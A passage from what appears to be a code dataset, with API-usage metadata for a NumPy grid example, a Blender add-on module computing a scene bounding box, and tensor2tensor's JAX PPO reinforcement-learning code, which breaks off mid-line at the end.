0, 0, 0, 1]]'}, {}), '([[1, 0, 0, 0, 1, 0, 0], [0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 0, 0, 0,\n 1], [0, 0, 0, 0, 0, 0, 0], [1, 0, 0, 0, 1, 0, 0], [0, 0, 0, 0, 0, 0, 0],\n [0, 0, 1, 0, 0, 0, 1]])', True, 'import numpy as np\n'), ((340, 17, 346, 51), 'numpy.matrix', 'np.matrix', ({(340, 27, 346, 50): '[[0, 0, 1, 0, 0, 0, 1], [0, 0, 0, 0, 0, 0, 0], [1, 0, 0, 0, 1, 0, 0], [0, 0,\n 0, 0, 0, 0, 0], [0, 0, 1, 0, 0, 0, 1], [0, 0, 0, 0, 0, 0, 0], [1, 0, 0,\n 0, 1, 0, 0]]'}, {}), '([[0, 0, 1, 0, 0, 0, 1], [0, 0, 0, 0, 0, 0, 0], [1, 0, 0, 0, 1, 0,\n 0], [0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 0, 0, 0, 1], [0, 0, 0, 0, 0, 0, 0],\n [1, 0, 0, 0, 1, 0, 0]])', True, 'import numpy as np\n'), ((363, 17, 
363, 51), 'numpy.zeros', 'np.zeros', (), '', True, 'import numpy as np\n'), ((364, 17, 364, 51), 'numpy.zeros', 'np.zeros', (), '', True, 'import numpy as np\n'), ((584, 36, 584, 52), 'json.load', 'json.load', ({(584, 46, 584, 51): 'jfile'}, {}), '(jfile)', False, 'import json\n'), ((378, 17, 378, 37), 'numpy.matrix', 'np.matrix', ({(378, 27, 378, 36): '[1, 0, 0]'}, {}), '([1, 0, 0])', True, 'import numpy as np\n'), ((379, 17, 379, 37), 'numpy.matrix', 'np.matrix', ({(379, 27, 379, 36): '[0, 0, 1]'}, {}), '([0, 0, 1])', True, 'import numpy as np\n'), ((356, 20, 356, 41), 'random.randrange', 'random.randrange', ({(356, 37, 356, 38): '0', (356, 39, 356, 40): '7'}, {}), '(0, 7)', False, 'import random\n'), ((357, 20, 357, 41), 'random.randrange', 'random.randrange', ({(357, 37, 357, 38): '0', (357, 39, 357, 40): '7'}, {}), '(0, 7)', False, 'import random\n'), ((386, 17, 386, 37), 'numpy.matrix', 'np.matrix', ({(386, 27, 386, 36): '[0, 0, 0]'}, {}), '([0, 0, 0])', True, 'import numpy as np\n'), ((387, 17, 387, 37), 'numpy.matrix', 'np.matrix', ({(387, 27, 387, 36): '[1, 0, 1]'}, {}), '([1, 0, 1])', True, 'import numpy as np\n'), ((394, 17, 394, 40), 'numpy.matrix', 'np.matrix', ({(394, 27, 394, 39): '[1, 0, 0, 0]'}, {}), '([1, 0, 0, 0])', True, 'import numpy as np\n'), ((395, 17, 395, 40), 'numpy.matrix', 'np.matrix', ({(395, 27, 395, 39): '[0, 0, 0, 1]'}, {}), '([0, 0, 0, 1])', True, 'import numpy as np\n'), ((402, 17, 402, 40), 'numpy.matrix', 'np.matrix', ({(402, 27, 402, 39): '[0, 0, 0, 0]'}, {}), '([0, 0, 0, 0])', True, 'import numpy as np\n'), ((403, 17, 403, 40), 'numpy.matrix', 'np.matrix', ({(403, 27, 403, 39): '[1, 0, 0, 1]'}, {}), '([1, 0, 0, 1])', True, 'import numpy as np\n'), ((410, 17, 410, 43), 'numpy.matrix', 'np.matrix', ({(410, 27, 410, 42): '[1, 0, 0, 0, 0]'}, {}), '([1, 0, 0, 0, 0])', True, 'import numpy as np\n'), ((411, 17, 411, 43), 'numpy.matrix', 'np.matrix', ({(411, 27, 411, 42): '[0, 0, 0, 0, 1]'}, {}), '([0, 0, 0, 0, 1])', True, 'import numpy as np\n'), ((418, 17, 418, 43), 'numpy.matrix', 'np.matrix', ({(418, 27, 418, 42): '[0, 0, 0, 0, 0]'}, {}), '([0, 0, 0, 0, 0])', True, 'import numpy as np\n'), ((419, 17, 419, 43), 'numpy.matrix', 'np.matrix', ({(419, 27, 419, 42): '[1, 0, 0, 0, 1]'}, {}), '([1, 0, 0, 0, 1])', True, 'import numpy as np\n'), ((426, 17, 426, 49), 'numpy.matrix', 'np.matrix', ({(426, 27, 426, 48): '[1, 0, 0, 0, 0, 0, 0]'}, {}), '([1, 0, 0, 0, 0, 0, 0])', True, 'import numpy as np\n'), ((427, 17, 427, 49), 'numpy.matrix', 'np.matrix', ({(427, 27, 427, 48): '[0, 0, 0, 0, 0, 0, 1]'}, {}), '([0, 0, 0, 0, 0, 0, 1])', True, 'import numpy as np\n'), ((434, 17, 434, 49), 'numpy.matrix', 'np.matrix', ({(434, 27, 434, 48): '[0, 0, 0, 0, 0, 0, 0]'}, {}), '([0, 0, 0, 0, 0, 0, 0])', True, 'import numpy as np\n'), ((435, 17, 435, 49), 'numpy.matrix', 'np.matrix', ({(435, 27, 435, 48): '[1, 0, 0, 0, 0, 0, 1]'}, {}), '([1, 0, 0, 0, 0, 0, 1])', True, 'import numpy as np\n'), ((442, 17, 444, 39), 'numpy.matrix', 'np.matrix', ({(442, 27, 444, 38): '[[0, 0, 0], [0, 0, 0], [0, 0, 0]]'}, {}), '([[0, 0, 0], [0, 0, 0], [0, 0, 0]])', True, 'import numpy as np\n'), ((445, 17, 447, 39), 'numpy.matrix', 'np.matrix', ({(445, 27, 447, 38): '[[1, 0, 1], [0, 0, 0], [0, 1, 0]]'}, {}), '([[1, 0, 1], [0, 0, 0], [0, 1, 0]])', True, 'import numpy as np\n'), ((454, 17, 456, 39), 'numpy.matrix', 'np.matrix', ({(454, 27, 456, 38): '[[0, 1, 0], [0, 0, 0], [1, 0, 1]]'}, {}), '([[0, 1, 0], [0, 0, 0], [1, 0, 1]])', True, 'import numpy as np\n'), ((457, 17, 459, 39), 'numpy.matrix', 
'np.matrix', ({(457, 27, 459, 38): '[[1, 0, 1], [0, 0, 0], [0, 1, 0]]'}, {}), '([[1, 0, 1], [0, 0, 0], [0, 1, 0]])', True, 'import numpy as np\n'), ((466, 17, 468, 39), 'numpy.matrix', 'np.matrix', ({(466, 27, 468, 38): '[[0, 0, 0], [0, 0, 0], [0, 0, 0]]'}, {}), '([[0, 0, 0], [0, 0, 0], [0, 0, 0]])', True, 'import numpy as np\n'), ((469, 17, 471, 39), 'numpy.matrix', 'np.matrix', ({(469, 27, 471, 38): '[[1, 0, 1], [0, 0, 0], [1, 0, 1]]'}, {}), '([[1, 0, 1], [0, 0, 0], [1, 0, 1]])', True, 'import numpy as np\n')]
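The grid-world loop in the record above picks actions through choose_action with an exploration rate Prob; the calls recorded in its apis field (random.random, random.choice, numpy.argmax) point to a standard epsilon-greedy rule. A minimal sketch of that rule, assuming a 1-D array of Q-values indexed by action; the helper name epsilon_greedy and its arguments are illustrative and not taken from the file:

import random
import numpy as np

def epsilon_greedy(q_values, actions, prob=0.3):
    # With probability `prob` explore: pick a uniformly random action.
    if random.random() < prob:
        return random.choice(actions)
    # Otherwise exploit: pick the action with the highest Q-value.
    return actions[int(np.argmax(q_values))]

# The file represents actions as strings such as 'up', 'down', 'right', 'left'.
print(epsilon_greedy(np.array([0.1, 0.7, 0.2, 0.0]), ['up', 'down', 'right', 'left'], prob=0.3))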
davidemarelli/sfm_flow
utils/scene_bounding_box.py
7a96d8309cc01b8499347ba0cae882923d82bbcc
import logging
from typing import Tuple

import bpy
from mathutils import Vector

from .object import get_objs

logger = logging.getLogger(__name__)


class SceneBoundingBox():
    """Scene bounding box, build a bounding box that includes all objects except the excluded ones."""

    ################################################################################################
    # Properties                                                                                   #
    # ==============================================================================================
    @property
    def width(self):
        """Scene's bounding box width."""
        return self.x_max - self.x_min

    # ==============================================================================================
    @property
    def depth(self):
        """Scene's bounding box depth."""
        return self.y_max - self.y_min

    # ==============================================================================================
    @property
    def height(self):
        """Scene's bounding box height."""
        return self.z_max - self.z_min

    # ==============================================================================================
    @property
    def floor_center(self):
        """Scene's bounding center on lower bbox plane."""
        return Vector((self.center[0], self.center[1], self.z_min))

    ################################################################################################
    # Constructor                                                                                  #
    # ==============================================================================================
    def __init__(self, scene: bpy.types.Scene,
                 exclude_collections: Tuple[str] = ("SfM_Environment", "SfM_Reconstructions")):
        self.scene = scene
        self.exclude_collections = exclude_collections
        #
        self.center = Vector()        # type: Vector
        self.x_min = float("inf")     # type: float
        self.x_max = float("-inf")    # type: float
        self.y_min = float("inf")     # type: float
        self.y_max = float("-inf")    # type: float
        self.z_min = float("inf")     # type: float
        self.z_max = float("-inf")    # type: float
        #
        self.compute()

    ################################################################################################
    # Methods                                                                                      #
    # ==============================================================================================
    def compute(self):
        """Compute the scene bounding box values."""
        objs = get_objs(self.scene, exclude_collections=self.exclude_collections, mesh_only=True)
        logger.debug("Found %i objects in scene %s", len(objs), self.scene.name)
        for obj in objs:
            obb = obj.bound_box
            for i in range(8):
                p = obj.matrix_world @ Vector(obb[i])
                self.x_min = min(self.x_min, p[0])
                self.x_max = max(self.x_max, p[0])
                self.y_min = min(self.y_min, p[1])
                self.y_max = max(self.y_max, p[1])
                self.z_min = min(self.z_min, p[2])
                self.z_max = max(self.z_max, p[2])
        if objs:
            self.center = Vector(((self.x_max + self.x_min) / 2,
                                  (self.y_max + self.y_min) / 2,
                                  (self.z_max + self.z_min) / 2))
        logger.debug(str(self))

    # ==============================================================================================
    def get_min_vector(self):
        """Get minimum axis."""
        return Vector((self.x_min, self.y_min, self.z_min))

    # ==============================================================================================
    def get_max_vector(self):
        """Get maximum axis."""
        return Vector((self.x_max, self.y_max, self.z_max))

    ################################################################################################
    # Builtin methods                                                                              #
    # ==============================================================================================
    def __str__(self):
        return "Scene bbox values: X=({:.3f}, {:.3f}), Y=({:.3f}, {:.3f}), Z=({:.3f}, {:.3f}), Center={}".format(
            self.x_min, self.x_max, self.y_min, self.y_max, self.z_min, self.z_max, self.center)
[((10, 9, 10, 36), 'logging.getLogger', 'logging.getLogger', ({(10, 27, 10, 35): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((42, 15, 42, 67), 'mathutils.Vector', 'Vector', ({(42, 22, 42, 66): '(self.center[0], self.center[1], self.z_min)'}, {}), '((self.center[0], self.center[1], self.z_min))', False, 'from mathutils import Vector\n'), ((54, 22, 54, 30), 'mathutils.Vector', 'Vector', ({}, {}), '()', False, 'from mathutils import Vector\n'), ((92, 15, 92, 59), 'mathutils.Vector', 'Vector', ({(92, 22, 92, 58): '(self.x_min, self.y_min, self.z_min)'}, {}), '((self.x_min, self.y_min, self.z_min))', False, 'from mathutils import Vector\n'), ((97, 15, 97, 59), 'mathutils.Vector', 'Vector', ({(97, 22, 97, 58): '(self.x_max, self.y_max, self.z_max)'}, {}), '((self.x_max, self.y_max, self.z_max))', False, 'from mathutils import Vector\n'), ((84, 26, 86, 65), 'mathutils.Vector', 'Vector', ({(84, 33, 86, 64): '((self.x_max + self.x_min) / 2, (self.y_max + self.y_min) / 2, (self.z_max +\n self.z_min) / 2)'}, {}), '(((self.x_max + self.x_min) / 2, (self.y_max + self.y_min) / 2, (self\n .z_max + self.z_min) / 2))', False, 'from mathutils import Vector\n'), ((76, 39, 76, 53), 'mathutils.Vector', 'Vector', ({(76, 46, 76, 52): 'obb[i]'}, {}), '(obb[i])', False, 'from mathutils import Vector\n')]
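The scene_bounding_box.py module above is Blender add-on code and only runs inside Blender's bundled Python. A minimal usage sketch; the import path below is an assumption about how the add-on package is laid out and is not confirmed by the file itself:

import bpy
from sfm_flow.utils.scene_bounding_box import SceneBoundingBox   # assumed import path

bbox = SceneBoundingBox(bpy.context.scene)          # the box is computed on construction
print(bbox.width, bbox.depth, bbox.height)          # extents along X, Y and Z
print(bbox.get_min_vector(), bbox.get_max_vector())  # world-space min/max corners
print(bbox.floor_center)                            # center projected onto the lowest Z plane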
funtion/tensor2tensor
tensor2tensor/trax/rlax/ppo.py
339295a276c4bfc93894c474979d0620d14b9710
# coding=utf-8 # Copyright 2019 The Tensor2Tensor Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """PPO in JAX. Notation: B, scalar - batch size T, scalar - number of time-steps in a trajectory, or the value of the padded time-step dimension. OBS, tuple - shape of a singular observation from the environment. Ex: For CartPole-v0 this is (4,) and Pong-v0 it's (210, 160, 3) A, scalar - Number of actions, assuming a discrete space. Policy and Value function signatures: Policy Function :: [B, T] + OBS -> [B, T, A] Value Function :: [B, T] + OBS -> [B, T, 1] Policy and Value Function :: [B, T] + OBS -> ([B, T, A], [B, T, 1]) i.e. the policy net should take a batch of *trajectories* and at each time-step in each batch deliver a probability distribution over actions. NOTE: It doesn't return logits, rather the expectation is that it returns log-probabilities instead. NOTE: The policy and value functions need to take care to not take into account future time-steps while deciding the actions (or value) for the current time-step. Policy and Value Function produces a tuple of the expected output of a policy function and a value function. """ from __future__ import absolute_import from __future__ import division from __future__ import print_function import functools import os import pickle import time from absl import logging import gym from jax import grad from jax import jit from jax import lax from jax import numpy as np from jax import random as jax_random import numpy as onp from tensor2tensor.envs import env_problem from tensor2tensor.envs import env_problem_utils from tensor2tensor.trax import jaxboard from tensor2tensor.trax import layers from tensor2tensor.trax import optimizers as trax_opt from tensor2tensor.trax import trax from tensorflow.io import gfile DEBUG_LOGGING = False GAMMA = 0.99 LAMBDA = 0.95 EPSILON = 0.1 EPOCHS = 50 # 100 NUM_OPTIMIZER_STEPS = 100 PRINT_EVERY_OPTIMIZER_STEP = 20 BATCH_TRAJECTORIES = 32 def policy_and_value_net(rng_key, batch_observations_shape, num_actions, bottom_layers_fn=None, two_towers=True): """A policy and value net function.""" # Layers. # Now, with the current logits, one head computes action probabilities and the # other computes the value function. # NOTE: The LogSoftmax instead of the Softmax because of numerical stability. 
net = None if not two_towers: tower = [] if bottom_layers_fn is None else bottom_layers_fn() tower.extend([ layers.Branch( layers.Serial(layers.Dense(num_actions), layers.LogSoftmax()), layers.Dense(1)) ]) net = layers.Serial(*tower) else: tower1 = [] if bottom_layers_fn is None else bottom_layers_fn() tower2 = [] if bottom_layers_fn is None else bottom_layers_fn() tower1.extend([layers.Dense(num_actions), layers.LogSoftmax()]) tower2.extend([layers.Dense(1)]) net = layers.Branch( layers.Serial(*tower1), layers.Serial(*tower2), ) assert net return net.initialize(batch_observations_shape, rng_key), net def optimizer_fun(net_params, step_size=1e-3): opt = trax_opt.Adam(step_size=step_size, b1=0.9, b2=0.999, eps=1e-08) opt_init = lambda x: (x, opt.tree_init(x)) opt_update = lambda i, g, s: opt.tree_update(i, g, s[0], s[1]) get_params = lambda x: x[0] opt_state = opt_init(net_params) return opt_state, opt_update, get_params # Should this be collect 'n' trajectories, or # Run the env for 'n' steps and take completed trajectories, or # Any other option? # TODO(afrozm): Replace this with EnvProblem? def collect_trajectories(env, policy_fun, num_trajectories=1, policy=env_problem_utils.CATEGORICAL_SAMPLING, max_timestep=None, boundary=20, epsilon=0.1, reset=True, rng=None): """Collect trajectories with the given policy net and behaviour. Args: env: A gym env interface, for now this is not-batched. policy_fun: observations(B,T+1) -> log-probabs(B,T+1, A) callable. num_trajectories: int, number of trajectories. policy: string, "greedy", "epsilon-greedy", or "categorical-sampling" i.e. how to use the policy_fun to return an action. max_timestep: int or None, the index of the maximum time-step at which we return the trajectory, None for ending a trajectory only when env returns done. boundary: int, boundary for padding, used in EnvProblem envs. epsilon: float, the epsilon for `epsilon-greedy` policy. reset: bool, true if we want to reset the envs. The envs are also reset if max_max_timestep is None or < 0 rng: jax rng, splittable. Returns: A tuple (trajectory, number of trajectories that are done) trajectory: list of (observation, action, reward) tuples, where each element `i` is a tuple of numpy arrays with shapes as follows: observation[i] = (B, T_i + 1) action[i] = (B, T_i) reward[i] = (B, T_i) """ assert isinstance(env, env_problem.EnvProblem) # This is an env_problem, run its collect function. return env_problem_utils.play_env_problem_with_policy( env, policy_fun, num_trajectories=num_trajectories, max_timestep=max_timestep, boundary=boundary, policy_sampling=policy, eps=epsilon, reset=reset, rng=rng) # This function can probably be simplified, ask how? # Can we do something much simpler than lax.pad, maybe np.pad? # Others? def get_padding_value(dtype): """Returns the padding value given a dtype.""" padding_value = None if dtype == np.uint8: padding_value = np.uint8(0) elif dtype == np.uint16: padding_value = np.uint16(0) elif dtype == np.float32 or dtype == np.float64: padding_value = 0.0 else: padding_value = 0 assert padding_value is not None return padding_value # TODO(afrozm): Use np.pad instead and make jittable? def pad_trajectories(trajectories, boundary=20): """Pad trajectories to a bucket length that is a multiple of boundary. Args: trajectories: list[(observation, actions, rewards)], where each observation is shaped (t+1,) + OBS and actions & rewards are shaped (t,), with the length of the list being B (batch size). 
boundary: int, bucket length, the actions and rewards are padded to integer multiples of boundary. Returns: tuple: (padding lengths, reward_mask, padded_observations, padded_actions, padded_rewards) where padded_observations is shaped (B, T+1) + OBS and padded_actions, padded_rewards & reward_mask are shaped (B, T). Where T is max(t) rounded up to an integer multiple of boundary. padded_length is how much padding we've added and reward_mask is 1s for actual rewards and 0s for the padding. """ # Let's compute max(t) over all trajectories. t_max = max(r.shape[0] for (_, _, r) in trajectories) # t_max is rounded to the next multiple of `boundary` boundary = int(boundary) bucket_length = boundary * int(np.ceil(float(t_max) / boundary)) # So all obs will be padded to t_max + 1 and actions and rewards to t_max. padded_observations = [] padded_actions = [] padded_rewards = [] padded_lengths = [] reward_masks = [] for (o, a, r) in trajectories: # Determine the amount to pad, this holds true for obs, actions and rewards. num_to_pad = bucket_length + 1 - o.shape[0] padded_lengths.append(num_to_pad) if num_to_pad == 0: padded_observations.append(o) padded_actions.append(a) padded_rewards.append(r) reward_masks.append(onp.ones_like(r, dtype=np.int32)) continue # First pad observations. padding_config = [(0, num_to_pad, 0)] for _ in range(o.ndim - 1): padding_config.append((0, 0, 0)) padding_config = tuple(padding_config) padding_value = get_padding_value(o.dtype) action_padding_value = get_padding_value(a.dtype) reward_padding_value = get_padding_value(r.dtype) padded_obs = lax.pad(o, padding_value, padding_config) padded_observations.append(padded_obs) # Now pad actions and rewards. assert a.ndim == 1 and r.ndim == 1 padding_config = ((0, num_to_pad, 0),) padded_action = lax.pad(a, action_padding_value, padding_config) padded_actions.append(padded_action) padded_reward = lax.pad(r, reward_padding_value, padding_config) padded_rewards.append(padded_reward) # Also create the mask to use later. reward_mask = onp.ones_like(r, dtype=np.int32) reward_masks.append(lax.pad(reward_mask, 0, padding_config)) return padded_lengths, np.stack(reward_masks), np.stack( padded_observations), np.stack(padded_actions), np.stack(padded_rewards) # TODO(afrozm): JAX-ify this, this is too slow for pong. def rewards_to_go(rewards, mask, gamma=0.99): r"""Computes rewards to go. Reward to go is defined as follows, the discounted reward that we have to yet collect, going forward from this point, i.e.: r2g_t = \sum_{l=0}^{\infty} (\gamma^{l} * reward_{t+l}) Args: rewards: np.ndarray of shape (B, T) of rewards. mask: np.ndarray of shape (B, T) of mask for the rewards. gamma: float, discount factor. Returns: rewards to go, np.ndarray of shape (B, T). """ B, T = rewards.shape # pylint: disable=invalid-name,unused-variable masked_rewards = rewards * mask # (B, T) # We use the following recurrence relation, derived from the equation above: # # r2g[t+1] = (r2g[t] - r[t]) / gamma # # This means we'll need to calculate r2g[0] first and then r2g[1] and so on .. # # **However** this leads to overflows for long sequences: r2g[t] - r[t] > 0 # and gamma < 1.0, so the division keeps increasing. # # So we just run the recurrence in reverse, i.e. # # r2g[t] = r[t] + (gamma*r2g[t+1]) # # This is much better, but might have lost updates since the (small) rewards # at earlier time-steps may get added to a (very?) large sum. # Compute r2g_{T-1} at the start and then compute backwards in time. r2gs = [masked_rewards[:, -1]] # Go from T-2 down to 0. 
for t in reversed(range(T - 1)): r2gs.append(masked_rewards[:, t] + (gamma * r2gs[-1])) # The list should have length T. assert T == len(r2gs) # First we stack them in the correct way to make it (B, T), but these are # still from newest (T-1) to oldest (0), so then we flip it on time axis. return np.flip(np.stack(r2gs, axis=1), axis=1) @jit def value_loss_given_predictions(value_prediction, rewards, reward_mask, gamma=0.99, epsilon=0.2, value_prediction_old=None): """Computes the value loss given the prediction of the value function. Args: value_prediction: np.ndarray of shape (B, T+1, 1) rewards: np.ndarray of shape (B, T) of rewards. reward_mask: np.ndarray of shape (B, T), the mask over rewards. gamma: float, discount factor. epsilon: float, clip-fraction, used if value_value_prediction_old isn't None value_prediction_old: np.ndarray of shape (B, T+1, 1) of value predictions using the old parameters. If provided, we incorporate this in the loss as well. This is from the OpenAI baselines implementation. Returns: The average L2 value loss, averaged over instances where reward_mask is 1. """ B, T = rewards.shape # pylint: disable=invalid-name assert (B, T) == reward_mask.shape assert (B, T + 1, 1) == value_prediction.shape value_prediction = np.squeeze(value_prediction, axis=2) # (B, T+1) value_prediction = value_prediction[:, :-1] * reward_mask # (B, T) r2g = rewards_to_go(rewards, reward_mask, gamma=gamma) # (B, T) loss = (value_prediction - r2g)**2 # From the baselines implementation. if value_prediction_old is not None: value_prediction_old = np.squeeze(value_prediction_old, axis=2) # (B, T+1) value_prediction_old = value_prediction_old[:, :-1] * reward_mask # (B, T) v_clipped = value_prediction_old + np.clip( value_prediction - value_prediction_old, -epsilon, epsilon) v_clipped_loss = (v_clipped - r2g)**2 loss = np.maximum(v_clipped_loss, loss) # Take an average on only the points where mask != 0. return np.sum(loss) / np.sum(reward_mask) # TODO(afrozm): JAX-ify this, this is too slow for pong. def deltas(predicted_values, rewards, mask, gamma=0.99): r"""Computes TD-residuals from V(s) and rewards. Where a `delta`, i.e. a td-residual is defined as: delta_{b,t} = r_{b,t} + \gamma * v_{b,t+1} - v_{b,t}. Args: predicted_values: ndarray of shape (B, T+1). NOTE: Expects axis 2 was squeezed. These represent V(s_bt) for b < B and t < T+1 rewards: ndarray of shape (B, T) of rewards. mask: ndarray of shape (B, T) of mask for rewards. gamma: float, discount factor. Returns: ndarray of shape (B, T) of one-step TD-residuals. """ # `d`s are basically one-step TD residuals. d = [] _, T = rewards.shape # pylint: disable=invalid-name for t in range(T): d.append(rewards[:, t] + (gamma * predicted_values[:, t + 1]) - predicted_values[:, t]) return np.array(d).T * mask def gae_advantages(td_deltas, mask, lambda_=0.95, gamma=0.99): r"""Computes the GAE advantages given the one step TD-residuals. The formula for a GAE advantage estimator is as follows: A_{bt} = \sum_{l=0}^{\infty}(\gamma * \lambda)^{l}(\delta_{b,t+l}). Internally we just call rewards_to_go, since it is the same computation. Args: td_deltas: np.ndarray of shape (B, T) of one step TD-residuals. mask: np.ndarray of shape (B, T) of mask for the residuals. It maybe the case that the `td_deltas` are already masked correctly since they are produced by `deltas(...)` lambda_: float, lambda parameter for GAE estimators. gamma: float, lambda parameter for GAE estimators. Returns: GAE advantage estimates. 
""" return rewards_to_go(td_deltas, mask, lambda_ * gamma) def chosen_probabs(probab_observations, actions): """Picks out the probabilities of the actions along batch and time-steps. Args: probab_observations: ndarray of shape `[B, T+1, A]`, where probab_observations[b, t, i] contains the log-probability of action = i at the t^th time-step in the b^th trajectory. actions: ndarray of shape `[B, T]`, with each entry in [0, A) denoting which action was chosen in the b^th trajectory's t^th time-step. Returns: `[B, T]` ndarray with the log-probabilities of the chosen actions. """ B, T = actions.shape # pylint: disable=invalid-name assert (B, T + 1) == probab_observations.shape[:2] return probab_observations[np.arange(B)[:, None], np.arange(T), actions] def compute_probab_ratios(p_new, p_old, actions, reward_mask): """Computes the probability ratios for each time-step in a trajectory. Args: p_new: ndarray of shape [B, T+1, A] of the log-probabilities that the policy network assigns to all the actions at each time-step in each batch using the old parameters. p_old: ndarray of shape [B, T+1, A], same as above, but using old policy network parameters. actions: ndarray of shape [B, T] where each element is from [0, A). reward_mask: ndarray of shape [B, T] masking over probabilities. Returns: probab_ratios: ndarray of shape [B, T], where probab_ratios_{b,t} = p_new_{b,t,action_{b,t}} / p_old_{b,t,action_{b,t}} """ B, T = actions.shape # pylint: disable=invalid-name assert (B, T + 1) == p_old.shape[:2] assert (B, T + 1) == p_new.shape[:2] logp_old = chosen_probabs(p_old, actions) logp_new = chosen_probabs(p_new, actions) assert (B, T) == logp_old.shape assert (B, T) == logp_new.shape # Since these are log-probabilities, we just subtract them. probab_ratios = np.exp(logp_new - logp_old) * reward_mask assert (B, T) == probab_ratios.shape return probab_ratios def clipped_probab_ratios(probab_ratios, epsilon=0.2): return np.clip(probab_ratios, 1 - epsilon, 1 + epsilon) def clipped_objective(probab_ratios, advantages, reward_mask, epsilon=0.2): return np.minimum( probab_ratios * advantages, clipped_probab_ratios(probab_ratios, epsilon=epsilon) * advantages) * reward_mask @jit def ppo_loss_given_predictions(log_probab_actions_new, log_probab_actions_old, value_predictions_old, padded_actions, padded_rewards, reward_mask, gamma=0.99, lambda_=0.95, epsilon=0.2): """PPO objective, with an eventual minus sign, given predictions.""" B, T = padded_rewards.shape # pylint: disable=invalid-name assert (B, T) == padded_actions.shape assert (B, T) == reward_mask.shape _, _, A = log_probab_actions_old.shape # pylint: disable=invalid-name assert (B, T + 1, 1) == value_predictions_old.shape assert (B, T + 1, A) == log_probab_actions_old.shape assert (B, T + 1, A) == log_probab_actions_new.shape # (B, T) td_deltas = deltas( np.squeeze(value_predictions_old, axis=2), # (B, T+1) padded_rewards, reward_mask, gamma=gamma) # (B, T) advantages = gae_advantages( td_deltas, reward_mask, lambda_=lambda_, gamma=gamma) # Normalize the advantages. advantages = (advantages - np.mean(advantages)) / np.std(advantages) # (B, T) ratios = compute_probab_ratios(log_probab_actions_new, log_probab_actions_old, padded_actions, reward_mask) assert (B, T) == ratios.shape # (B, T) objective = clipped_objective( ratios, advantages, reward_mask, epsilon=epsilon) assert (B, T) == objective.shape # () average_objective = np.sum(objective) / np.sum(reward_mask) # Loss is negative objective. 
return -average_objective @jit def combined_loss_given_predictions(log_probab_actions_new, log_probab_actions_old, value_prediction_new, value_prediction_old, padded_actions, padded_rewards, reward_mask, gamma=0.99, lambda_=0.95, epsilon=0.2, c1=1.0, c2=0.01): """Computes the combined (clipped loss + value loss) given predictions.""" loss_value = value_loss_given_predictions( value_prediction_new, padded_rewards, reward_mask, gamma=gamma, value_prediction_old=value_prediction_old, epsilon=epsilon) loss_ppo = ppo_loss_given_predictions( log_probab_actions_new, log_probab_actions_old, value_prediction_old, padded_actions, padded_rewards, reward_mask, gamma=gamma, lambda_=lambda_, epsilon=epsilon) entropy_bonus = masked_entropy(log_probab_actions_new, reward_mask) return (loss_ppo + (c1 * loss_value) - (c2 * entropy_bonus), loss_ppo, loss_value, entropy_bonus) @functools.partial(jit, static_argnums=(3,)) def combined_loss(new_params, log_probab_actions_old, value_predictions_old, policy_and_value_net_apply, padded_observations, padded_actions, padded_rewards, reward_mask, gamma=0.99, lambda_=0.95, epsilon=0.2, c1=1.0, c2=0.01, rng=None): """Computes the combined (clipped loss + value loss) given observations.""" log_probab_actions_new, value_predictions_new = policy_and_value_net_apply( padded_observations, new_params, rng=rng) # (combined_loss, ppo_loss, value_loss, entropy_bonus) return combined_loss_given_predictions( log_probab_actions_new, log_probab_actions_old, value_predictions_new, value_predictions_old, padded_actions, padded_rewards, reward_mask, gamma=gamma, lambda_=lambda_, epsilon=epsilon, c1=c1, c2=c2) @functools.partial(jit, static_argnums=(2, 3, 4)) def policy_and_value_opt_step(i, opt_state, opt_update, get_params, policy_and_value_net_apply, log_probab_actions_old, value_predictions_old, padded_observations, padded_actions, padded_rewards, reward_mask, c1=1.0, c2=0.01, gamma=0.99, lambda_=0.95, epsilon=0.1, rng=None): """Policy and Value optimizer step.""" # Combined loss function given the new params. def policy_and_value_loss(params): """Returns the combined loss given just parameters.""" (loss, _, _, _) = combined_loss( params, log_probab_actions_old, value_predictions_old, policy_and_value_net_apply, padded_observations, padded_actions, padded_rewards, reward_mask, c1=c1, c2=c2, gamma=gamma, lambda_=lambda_, epsilon=epsilon, rng=rng) return loss new_params = get_params(opt_state) g = grad(policy_and_value_loss)(new_params) # TODO(afrozm): Maybe clip gradients? return opt_update(i, g, opt_state) def get_time(t1, t2=None): if t2 is None: t2 = time.time() return round((t2 - t1) * 1000, 2) def approximate_kl(log_prob_new, log_prob_old, mask): """Computes the approximate KL divergence between the old and new log-probs. Args: log_prob_new: (B, T+1, A) log probs new log_prob_old: (B, T+1, A) log probs old mask: (B, T) Returns: Approximate KL. """ diff = log_prob_old - log_prob_new # Cut the last time-step out. diff = diff[:, :-1] # Mask out the irrelevant part. diff *= mask[:, :, np.newaxis] # make mask (B, T, 1) # Average on non-masked part. return np.sum(diff) / np.sum(mask) def masked_entropy(log_probs, mask): """Computes the entropy for the given log-probs. Args: log_probs: (B, T+1, A) log probs mask: (B, T) mask. Returns: Entropy. """ # Cut the last time-step out. lp = log_probs[:, :-1] # Mask out the irrelevant part. lp *= mask[:, :, np.newaxis] # make mask (B, T, 1) p = np.exp(lp) * mask[:, :, np.newaxis] # (B, T, 1) # Average on non-masked part and take negative. 
return -(np.sum(lp * p) / np.sum(mask)) def evaluate_policy(eval_env, get_predictions, boundary, max_timestep=20000, rng=None): """Evaluate the policy.""" avg_rewards = {} for policy in [ env_problem_utils.CATEGORICAL_SAMPLING, env_problem_utils.GUMBEL_SAMPLING, env_problem_utils.EPSILON_GREEDY ]: trajs, _ = env_problem_utils.play_env_problem_with_policy( eval_env, get_predictions, boundary=boundary, max_timestep=max_timestep, reset=True, policy_sampling=policy, rng=rng) avg_rewards[policy] = float(sum( np.sum(traj[2]) for traj in trajs)) / len(trajs) return avg_rewards def maybe_restore_params(output_dir, policy_and_value_net_params): """Maybe restore the params from the checkpoint dir. Args: output_dir: Directory where saved model checkpoints are stored. policy_and_value_net_params: Default params, returned if model is'nt found. Returns: triple (restore (bool), params, iter(int)) where iter is the epoch from which we restored the params, 0 is restore = False. """ model_files = gfile.glob(os.path.join(output_dir, "model-??????.pkl")) if not 